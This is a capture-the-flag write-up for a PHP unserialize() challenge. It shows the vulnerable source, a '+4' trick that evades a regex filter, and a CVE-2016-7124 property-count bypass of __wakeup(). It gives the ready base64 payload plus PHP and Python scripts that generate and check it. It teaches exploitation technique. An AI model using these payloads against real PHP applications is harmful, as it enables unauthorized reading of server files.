web_php_unserialize
The topic of this challenge is PHP deserialization (`unserialize()`).

Looking at the challenge: the source code is shown as soon as you open the page.
```php
<?php
class Demo {
    private $file = 'index.php';
    public function __construct($file) {
        $this->file = $file;
    }
    function __destruct() {
        echo @highlight_file($this->file, true);
    }
    function __wakeup() {
        if ($this->file != 'index.php') {
            //the secret is in the fl4g.php
            $this->file = 'index.php';
        }
    }
}
if (isset($_GET['var'])) {
    $var = base64_decode($_GET['var']);
    if (preg_match('/[oc]:\d+:/i', $var)) {
        die('stop hacking!');
    } else {
        @unserialize($var);
    }
} else {
    highlight_file("index.php");
}
?>
```

The goal is to have `__destruct()` run with `$file` set to `fl4g.php`. Two things stand in the way: the regex `/[oc]:\d+:/i` rejects any serialized object (`O:4:`) or class (`C:`) token, and `__wakeup()` resets `$file` to `index.php` on every deserialization.
Now construct the `var` parameter:

- Initial serialized string: `O:4:"Demo":1:{s:10:"\0Demo\0file";s:8:"fl4g.php";}`. Because `$file` is a private property, its serialized name is `\0Demo\0file` (10 bytes including the two NUL bytes, hence `s:10`). A browser does not display the NULs, so the name looks like `Demofile` when echoed, but the bytes must be present in the payload.
- Bypass the `o/c:digits` filter: replace the `4` with `+4`. `\d+` requires a digit right after the colon, so `O:+4:` does not match the regex, while `unserialize()` still accepts `+4` as the class-name length: `O:+4:"Demo":1:{s:10:"\0Demo\0file";s:8:"fl4g.php";}`
- Bypass `__wakeup`: replace the property count `1` with `2`. This uses CVE-2016-7124: when the property count declared in the serialized string is greater than the real number of properties, PHP (before 5.6.25 / 7.0.10) skips `__wakeup()`, so `$file` is not reset and `__destruct()` highlights `fl4g.php`: `O:+4:"Demo":2:{s:10:"\0Demo\0file";s:8:"fl4g.php";}`
- base64-encode the result: `TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==`. Generate this value with the script, not by copying the echoed string out of the browser: the browser drops the NUL bytes, and the value obtained that way (`TzorNDoiRGVtbyI6Mjp7czoxMDoiRGVtb2ZpbGUiO3M6ODoiZmw0Zy5waHAiO30=`) decodes to `s:10:"Demofile"`, whose length no longer matches, so `unserialize()` fails and nothing is highlighted.
PHP script used to generate the payload (run it locally, then copy the last line into `?var=`):

```php
<?php
class Demo {
    private $file = 'index.php';
    public function __construct($file) {
        $this->file = $file;
    }
    function __destruct() {
        echo @highlight_file($this->file, true);
    }
    function __wakeup() {
        if ($this->file != 'index.php') {
            //the secret is in the fl4g.php
            $this->file = 'index.php';
        }
    }
}
$a = new Demo('fl4g.php');
$b = serialize($a);                   // O:4:"Demo":1:{s:10:"\0Demo\0file";s:8:"fl4g.php";}
echo $b;
echo '<br>';
$c = str_replace('O:4', 'O:+4', $b);  // "+4" is not matched by /[oc]:\d+:/i
$c = str_replace(':1:', ':2:', $c);   // over-declare the property count to skip __wakeup (CVE-2016-7124)
echo $c;
echo '<br>';
echo base64_encode($c);               // the value for the var parameter, NUL bytes included
?>
```
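The same payload construction in Python, as an added example that is not part of the original writeup: it builds the serialized object byte by byte (so the NUL bytes of the private property name are explicit), mirrors the challenge's `preg_match` filter to confirm that only the `+4` form gets through, and adds a length check that catches a payload whose NULs were lost in copy/paste. The function names (`build_payload`, `filter_blocks`, `lengths_consistent`, `check_var`) are my own.

```python
import base64
import re

# Mirrors the challenge's filter preg_match('/[oc]:\d+:/i', $var): a serialized
# object "O:<digits>:" or class "C:<digits>:" token is rejected.
FILTER = re.compile(rb"[oc]:\d+:", re.IGNORECASE)

# Matches each PHP serialized string token up to and including its opening quote.
STRING_TOKEN = re.compile(rb's:(\d+):"')


def private_prop_name(cls: str, prop: str) -> bytes:
    """PHP serializes a private property as \\0Class\\0prop; the two NUL bytes
    count toward the s:N length, which is why Demo::$file is s:10 and not s:8."""
    return b"\x00" + cls.encode() + b"\x00" + prop.encode()


def php_string(value: bytes) -> bytes:
    """PHP serialized string token: s:<byte length>:"<bytes>";"""
    return b's:%d:"%s";' % (len(value), value)


def build_payload(cls: str = "Demo", prop: str = "file", value: str = "fl4g.php",
                  plus_trick: bool = True, bump_count: bool = True) -> bytes:
    """Serialized Demo object with the two bypasses from the writeup applied:
    plus_trick -> write the class-name length as +4 so [oc]:\\d+: does not match;
    bump_count -> declare 2 properties while only 1 is present, so __wakeup()
                  is skipped (CVE-2016-7124, PHP before 5.6.25 / 7.0.10)."""
    body = php_string(private_prop_name(cls, prop)) + php_string(value.encode())
    real_count = 1
    declared = real_count + 1 if bump_count else real_count
    length = (b"+%d" if plus_trick else b"%d") % len(cls)
    return b'O:%s:"%s":%d:{%s}' % (length, cls.encode(), declared, body)


def filter_blocks(payload: bytes) -> bool:
    """True when the challenge's preg_match would die('stop hacking!')."""
    return FILTER.search(payload) is not None


def lengths_consistent(payload: bytes) -> bool:
    """Check that every s:N:"..." token is really followed by N bytes and then ";
    A payload copied out of a browser loses its NUL bytes, so s:10 is followed by
    only 8 bytes and unserialize() fails silently; catch that before sending."""
    pos = 0
    while True:
        m = STRING_TOKEN.search(payload, pos)
        if m is None:
            return True
        start = m.end()
        n = int(m.group(1))
        if payload[start + n:start + n + 2] != b'";':
            return False
        pos = start + n + 2


def encode_var(payload: bytes) -> str:
    """Value for the ?var= parameter (base64, as the challenge expects)."""
    return base64.b64encode(payload).decode()


def check_var(var: str) -> bool:
    """Decode a ?var= value and verify it passes the filter and has sane lengths."""
    payload = base64.b64decode(var)
    return (not filter_blocks(payload)) and lengths_consistent(payload)


if __name__ == "__main__":
    plain = build_payload(plus_trick=False, bump_count=False)
    print("blocked by filter:", filter_blocks(plain), plain)
    final = build_payload()
    print("blocked by filter:", filter_blocks(final), final)
    print("var =", encode_var(final))
```

`check_var()` is the step worth keeping in your toolbox: run it on whatever you are about to paste into the URL, because a payload that looks right in a terminal can still be missing the NULs, and the challenge swallows the resulting `unserialize()` error with `@`, leaving you with a blank page and no hint of why.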